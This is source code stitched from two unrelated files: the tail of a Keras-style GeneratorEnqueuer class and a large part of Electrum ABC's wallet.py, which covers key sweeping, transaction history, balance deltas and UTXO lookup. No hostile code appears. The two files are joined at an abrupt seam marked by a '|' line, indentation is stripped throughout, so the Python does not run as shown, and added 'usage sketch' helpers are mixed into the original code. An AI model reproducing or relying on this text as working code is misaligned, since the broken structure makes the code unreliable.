self.queue = self._manager.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
# On all OSes, avoid **SYSTEMATIC** error in multithreading mode:
# `ValueError: generator already executing`
# => Serialize calls to infinite iterator/generator's next() function
self.genlock = threading.Lock()
self.queue = queue.Queue(maxsize=max_queue_size)
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.seed)
thread = multiprocessing.Process(target=self._data_generator_task)
thread.daemon = True
if self.seed is not None:
self.seed += 1
else:
thread = threading.Thread(target=self._data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if self._use_multiprocessing:
if thread.is_alive():
thread.terminate()
else:
# The thread.is_alive() test is subject to a race condition:
# the thread could terminate right after the test and before the
# join, rendering this test meaningless -> Call thread.join()
# always, which is ok no matter what the status of the thread.
thread.join(timeout)
if self._manager:
self._manager.shutdown()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
while self.is_running():
if not self.queue.empty():
success, value = self.queue.get()
# Rethrow any exceptions found in the queue
if not success:
six.reraise(value.__class__, value, value.__traceback__)
# Yield regular values
if value is not None:
yield value
else:
all_finished = all([not thread.is_alive() for thread in self._threads])
if all_finished and self.queue.empty():
return  # end the generator (raising StopIteration here is a RuntimeError under PEP 479 / Python 3.7+)
else:
time.sleep(self.wait_time)
# Make sure to rethrow the first exception in the queue, if any
while not self.queue.empty():
success, value = self.queue.get()
if not success:
six.reraise(value.__class__, value, value.__traceback__)
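# Minimal usage sketch for GeneratorEnqueuer (toy generator, threading mode since
# multiprocessing cannot marshal generators on Windows; defined but never called here).
def _example_generator_enqueuer(steps=5):
    def toy_generator():
        i = 0
        while True:
            yield (np.zeros((2, 4)), np.full((2,), i))  # fake (inputs, targets) batch
            i += 1
    enqueuer = GeneratorEnqueuer(toy_generator(), use_multiprocessing=False)
    enqueuer.start(workers=1, max_queue_size=4)
    gen = enqueuer.get()
    batches = [next(gen) for _ in range(steps)]
    enqueuer.stop()
    return batches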
|
wallet.py
|
# Electrum ABC - lightweight eCash client
# Copyright (C) 2020 The Electrum ABC developers
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from typing import Set, Tuple, Union
from .constants import DUST_THRESHOLD
from .i18n import ngettext
from .util import (NotEnoughFunds, ExcessiveFee, PrintError,
UserCancelled, InvalidPassword, profiler,
format_satoshis, format_time, finalization_print_error,
to_string, bh2u, TimeoutException)
from .address import Address, Script, ScriptOutput, PublicKey
from .version import PACKAGE_VERSION
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import mnemo
from . import keystore
from .storage import (
multisig_type,
WalletStorage,
STO_EV_PLAINTEXT,
STO_EV_USER_PW,
STO_EV_XPUB_PW,
)
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if bitcoin.is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(bitcoin.TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < DUST_THRESHOLD:
raise NotEnoughFunds(_('Not enough funds on address.') + f'\nTotal: {total} satoshis\nFee: {fee}\nDust Threshold: {DUST_THRESHOLD}')
outputs = [(bitcoin.TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
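# Minimal usage sketch (not part of the original module; defined but never called here).
# `privkeys` is a list of WIF strings, `network` a connected Network instance, `config` a
# SimpleConfig-like object, and `recipient_addr_str` an address string -- all supplied by
# the caller. sweep() returns a signed transaction; broadcasting is left to the caller.
def _example_sweep(privkeys, network, config, recipient_addr_str):
    recipient = Address.from_string(recipient_addr_str)
    tx = sweep(privkeys, network, config, recipient, fee=None, imax=100)
    return tx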
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history changes). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other; a coin is 'spendable'
# only if it passes BOTH checks (i.e. neither its address nor the coin itself is frozen).
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Address objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore_ in enumerate(keystores):
if i == 0 and isinstance(keystore_, Deterministic_KeyStore) and not keystore_.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore_, Old_KeyStore):
keystore_.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore_.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore_.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore_.has_derivation() and keystore_.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore_ did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore_.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text = None):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up since is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove the tx from the unverified map and add it to the verified map.
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_hash(), except our
version returns None instead of NULL_HASH_HEX on a 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
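# unverified txs have height <= 0; map them to pseudo-heights of 1e9 or
# more so they sort after every verified tx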
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
"""Effect of tx on address."""
assert isinstance(address, Address)
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# subtract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
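# For orientation, the (assumed) shapes of the two history dicts consulted
# above, with illustrative values only:
#
#   self.txi = { tx_hash: { Address: [("prevout_hash:n", value_sats), ...] } }
#   self.txo = { tx_hash: { Address: [(output_n, value_sats, is_coinbase), ...] } }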
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status = _('Partially signed') + ' (%d/%d)' % (s, r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
